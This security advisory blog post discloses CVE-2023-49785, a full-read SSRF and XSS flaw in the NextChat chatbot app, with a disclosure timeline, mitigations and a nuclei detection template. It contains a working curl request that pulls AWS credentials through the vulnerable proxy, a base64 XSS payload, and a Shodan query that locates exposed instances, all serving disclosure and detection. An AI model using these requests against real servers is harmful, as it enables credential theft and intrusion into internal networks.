2024-03-11 21:01:55 Author: securityboulevard.com



With the advent of generative AI, AI chatbots are everywhere. While users can chat with large language models (LLMs) using a SaaS provider like OpenAI, there are lots of standalone chatbot applications available for users to deploy and use too. These standalone applications generally offer a richer user interface than OpenAI, additional features such as the ability to plug in and test different models, and the ability to potentially bypass IP block restrictions.



From our research, the most widely deployed standalone Gen AI chatbot is NextChat, a.k.a ChatGPT-Next-Web. This is a GitHub project with 63K+ stars and 52K+ forks. The Shodan query title:NextChat,"ChatGPT Next Web" pulls up 7500+ exposed instances, mostly in China and the US.

This application is vulnerable to a critical full-read server-side request forgery (SSRF) vulnerability, CVE-2023-49785, that we disclosed to the vendor in November 2023. As of this writing, there is no patch for the vulnerability, and since more than 90 days have passed since our original disclosure, we are now releasing full details here.

CVE-2023-49785: A Super SSRF

NextChat is a Next.js-based JavaScript application, and most of its functionality is implemented as client-side code.



There are, however, a few exposed server endpoints. One of these endpoints is at /api/cors, and it functions by design as an open proxy, allowing unauthenticated users to send arbitrary HTTP requests through it. This endpoint appears to have been added to support saving client-side chat data to WebDAV servers. The presence of this endpoint is an anti-pattern: it allows clients to bypass built-in browser protections for accessing cross-domain resources by accessing them through a server-side endpoint instead.



For instance, to access Google through this proxy, one can make the following request:

SSRF vulnerabilities vary considerably in terms of real-world impact. This particular SSRF is about as bad as it gets. It’s dangerous because:

- It enables access to arbitrary HTTP endpoints, including any internal endpoints

- It returns the full response from any accessed HTTP endpoints

- It supports arbitrary HTTP methods such as POST, PUT, etc. by setting the method header. Request bodies are also passed along.

- URL query parameters can be passed along with URL encoding.

- It supports passing along an Authorization header in requests.

If this application is exposed on the Internet, an attacker essentially has full access to any other HTTP resources accessible in the same internal network as the application. The only limitation is passing along other headers such as Cookie or Content-Type, though there may be creative ways to inject these headers.
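As a rough illustration of the request shape described above, the following Python sketch only builds the proxied URL and headers; it sends nothing. The path layout `/api/cors/<scheme>/<host>/<path>` is inferred from the curl example in this post, and the function name `build_proxy_request`, the host `nextchat.example`, and the exact way the query string is encoded are assumptions made for illustration.

```python
from urllib.parse import quote, urlsplit


def build_proxy_request(base_url, target_url, method="GET", authorization=None):
    """Return (url, headers) for relaying target_url through /api/cors.

    The /api/cors/<scheme>/<host>/<path> layout is inferred from the curl
    example in this post; it is an assumption, not a documented API.
    """
    parts = urlsplit(target_url)
    proxied = f"{base_url.rstrip('/')}/api/cors/{parts.scheme}/{parts.netloc}{parts.path}"
    if parts.query:
        # Percent-encode "?" and the query so they stay inside the proxied
        # path instead of being parsed as the proxy's own query string.
        proxied += quote("?" + parts.query, safe="")
    # Per the post, a header named "method" selects the upstream HTTP method.
    headers = {"method": method}
    if authorization is not None:
        headers["Authorization"] = authorization
    return proxied, headers


url, headers = build_proxy_request(
    "http://nextchat.example:3000",  # hypothetical exposed instance
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/REDACTED",
)
print(url)
print(headers)
```

Keeping the builder free of network calls makes it easy to check the resulting URL against what a proxy log or WAF rule would see.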



Here’s an example of accessing the AWS cloud metadata service to retrieve AWS access keys off an AWS EC2 instance running with IMDSv1 enabled:

    sh-3.2# curl http://54.145.48.76:3000/api/cors/http/169.254.169.254/latest/meta-data/iam/security-credentials/REDACTED
    {
      "Code" : "Success",
      "LastUpdated" : "2024-03-08T00:22:17Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "ASIA-REDACTED",
      "SecretAccessKey" : "C2CW-REDACTED",
      "Token" : "IQoJb3JpZ2luX2VjENH-REDACTED",
      "Expiration" : "2024-03-08T06:58:15Z"
    }

Reflected XSS



Almost all reflected XSS vulnerabilities are of little value to attackers. But we thought it was interesting to note that this vulnerability can be used to directly trigger an XSS without loading another site. This is because the fetch method used by the /api/cors endpoint also supports the data protocol.

For instance, the following payload:

data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23

will be decoded to <script>alert(document.domain)</script> at the server and sent back to the client, resulting in XSS.
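To see why this payload yields a script tag served as HTML, it can be decoded offline. The sketch below is a minimal Python decoder for this one payload, not a full data: URL parser; the helper name `decode_data_url` is made up for illustration.

```python
import base64
from urllib.parse import unquote


def decode_data_url(encoded):
    """Split a percent-encoded data: URL into (media_type, decoded_body)."""
    url = unquote(encoded)            # %2f -> "/", %23 -> "#"
    url = url.split("#", 1)[0]        # drop the trailing fragment marker
    header, _, payload = url.partition(",")
    if not header.startswith("data:"):
        raise ValueError("not a data: URL")
    media_type, *params = header[len("data:"):].split(";")
    if "base64" in params:
        body = base64.b64decode(payload).decode("utf-8")
    else:
        body = payload                # already percent-decoded above
    return media_type, body


payload = "data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
media_type, body = decode_data_url(payload)
print(media_type)  # text/html
print(body)        # <script>alert(document.domain)</script>
```

The media type matters as much as the body: because the data: URL declares text/html, the proxied response is rendered as HTML in the application's origin.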

Mitigations

Our assessment of this vulnerability puts the CVSS base score at 9.1 (critical). The vulnerability not only enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies.
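The 9.1 figure can be reproduced from the CVSS v3.1 vector listed in the nuclei template in this post (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). The Python sketch below applies the base score equations from the CVSS v3.1 specification for the scope-unchanged case; the weight table only covers the metric values that appear in this vector, so it is a worked example rather than a general calculator.

```python
import math

# CVSS v3.1 weights, limited to the metric values used in this vector.
WEIGHTS = {
    "AV": {"N": 0.85},
    "AC": {"L": 0.77},
    "PR": {"N": 0.85},
    "UI": {"N": 0.85},
    "C": {"H": 0.56},
    "I": {"H": 0.56},
    "A": {"N": 0.0},
}


def roundup(value):
    """CVSS v3.1 Roundup: smallest number with one decimal that is >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(vector):
    """Compute the base score for a scope-unchanged (S:U) vector."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles S:U vectors")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


vector = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
print(base_score_scope_unchanged(vector))  # 9.1
```

Here the impact sub-score is about 5.18 and the exploitability sub-score about 3.89; their sum, roughly 9.06, rounds up to 9.1.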

As of this writing, there is no patch for the vulnerability. More than 90 days have passed since our original contact.

- Nov. 25, 2023: Horizon3 reports security issue to ChatGPT-Next-Web via GitHub vulnerability disclosure process

- Nov. 26, 2023: Vendor accepts the report

- Dec. 6, 2023: GitHub CNA reserves CVE-2023-49785

- Jan. 15, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.

- Mar. 7, 2024: Horizon3 asks vendor for an update using the GitHub security issue. No response.

- Mar. 11, 2024: Public disclosure

We recommend that users not expose this application on the Internet. If it must be exposed to the Internet, ensure it is in an isolated network with no access to any other internal resources. Beware that attackers can still use the application as an open proxy to disguise malicious traffic to other targets through it.
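For operators who place their own filtering in front of the application, the sketch below shows the kind of destination check that an open proxy lacks. It is not a NextChat patch and does not reflect the vendor's code; the function name `is_allowed_target` and the host `dav.example.com` are hypothetical. It assumes the only legitimate destinations are a short list of known WebDAV hosts.

```python
import ipaddress
from urllib.parse import urlsplit


def is_allowed_target(url, allowed_hosts):
    """Return True only for http(s) URLs whose host is explicitly allowlisted."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False  # rejects data:, file:, and other schemes
    host = parts.hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        pass  # not an IP literal, fall through to the allowlist check
    else:
        return False  # refuse literal IPs such as 169.254.169.254 or ::1
    return host in allowed_hosts


allowed = {"dav.example.com"}  # hypothetical WebDAV host
print(is_allowed_target("https://dav.example.com/remote.php/webdav/", allowed))
print(is_allowed_target("http://169.254.169.254/latest/meta-data/", allowed))
print(is_allowed_target("data:text/html;base64,AAAA", allowed))
```

An allowlist of hostnames does not by itself stop a listed name from resolving to an internal address, so a check like this complements network isolation rather than replacing it.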

Detection



The following nuclei template can be used to detect this vulnerability. The vulnerable code was introduced in Sept. 2023. The majority of instances online, including any instances using the more recent “NextChat” name, are highly likely to be vulnerable.

    id: CVE-2023-49785

    info:
      name: CVE-2023-49785
      author: nvn1729
      severity: critical
      description: Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
      remediation: |
        Do not expose to the Internet
      classification:
        cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
        cvss-score: 9.1
        cve-id: CVE-2023-49785
      tags: cve-2023-49785,ssrf,xss

    http:
      - method: GET
        path:
          - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
          - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

        matchers-condition: and
        matchers:
          - type: word
            part: interactsh_protocol # Confirms the DNS interaction from second request
            words:
              - "dns"

          - type: dsl
            dsl:
              - 'contains(body_1, "<script>alert(document.domain)</script>") && contains(header_1, "text/html")' # XSS validation in first request
              - 'contains(header_2, "X-Interactsh-Version")' # Or got HTTP response back from Interact server
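The matcher logic in the template can be restated as a small Python predicate. This is a reading of the template, not nuclei's implementation: it assumes the two top-level matchers are combined with AND (per matchers-condition) and that the two expressions inside the dsl matcher are alternatives, as the template's own comment suggests. The function and parameter names are made up for illustration.

```python
XSS_MARKER = "<script>alert(document.domain)</script>"


def template_matches(interactsh_protocols, body_1, header_1, header_2):
    """Mirror the template: DNS callback AND (reflected XSS OR HTTP callback)."""
    # Word matcher: the second request caused a DNS lookup of the interactsh host.
    dns_seen = "dns" in interactsh_protocols
    # First dsl expression: the data: payload came back as HTML in response 1.
    xss_reflected = XSS_MARKER in body_1 and "text/html" in header_1
    # Second dsl expression: response 2 carries the interactsh server's header.
    http_callback = "X-Interactsh-Version" in header_2
    return dns_seen and (xss_reflected or http_callback)


print(template_matches(["dns"], XSS_MARKER, "Content-Type: text/html", ""))
print(template_matches([], XSS_MARKER, "Content-Type: text/html", ""))
```

Requiring the DNS interaction in addition to one of the response checks means a target that merely echoes the payload, without making an outbound request, is not reported.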

Conclusion

Over the last two years, we have observed the rapid pace of development of new generative AI applications, and there is a big appetite to use and experiment with these applications. We’ve also observed a steady blurring of lines between personal use and corporate use. While NextChat is primarily meant for personal use, we’ve seen it in a few of our own client environments.

Security has simply not kept up, in both AppSec practices and vulnerability disclosure processes. The focus of the infosec community and media at large has been on “security harms” like prompt injection or model poisoning, but there are lots of high-impact, conventional vulnerabilities to be found. We recommend users exercise caution when exposing any unvetted Gen AI tools to the Internet.


The post NextChat: An AI Chatbot That Lets You Talk to Anyone You Want To appeared first on Horizon3.ai.

*** This is a Security Bloggers Network syndicated blog from Horizon3.ai authored by Naveen Sunkavally. Read the original post at: https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
